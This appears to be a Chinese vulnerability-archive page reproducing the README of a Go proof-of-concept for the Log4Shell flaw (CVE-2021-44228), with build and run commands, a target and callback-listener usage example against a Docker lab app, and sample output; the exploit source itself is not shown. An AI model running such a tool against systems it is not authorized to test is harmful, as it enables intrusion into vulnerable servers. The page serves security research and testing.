关联漏洞
描述
A simple Log4j PoC written in Go
介绍
# CVE-2021-44228 PoC (Log4Shell)
⚠️ **Disclaimer:**
This tool is intended for **educational purposes, security research, and controlled test environments only.**
Using it against systems without explicit permission is **illegal** and entirely the responsibility of the user.
---
## 📌 Description
This project contains a simple **Proof-of-Concept (PoC)** exploit for **Apache Log4j2 (CVE-2021-44228)** vulnerability.
The PoC sends a specially crafted HTTP header with a JNDI LDAP payload to the target.
If the target is vulnerable, it will send a **callback** to the specified `LHOST` address.
---
## 🚀 Usage
### 1️⃣ Build
```bash
go build -o exploit exploit.go
```
### 2️⃣ Run
```bash
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
```
- `-r` → Target URL (endpoint of the vulnerable application)
- `-l` → Your callback listener IP address (the machine running the PoC)
---
## 🛠️ Example
Using the provided Docker vulnerable app:
```bash
# Run vulnerable app
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app
# Run exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1
```
Expected output:
```
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE
```
---
## ⚠️ Disclaimer
This software is provided for **educational and authorized security testing only**.
The author is **not responsible for any misuse** of this tool.
Do not use it against systems you do not own or do not have explicit permission to test.
文件快照
[4.0K] /data/pocs/25f666ddeb0c4ac404f5e2fa5d6d5779c91070e4
├── [1.0K] LICENSE
├── [1021] poc.go
└── [1.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。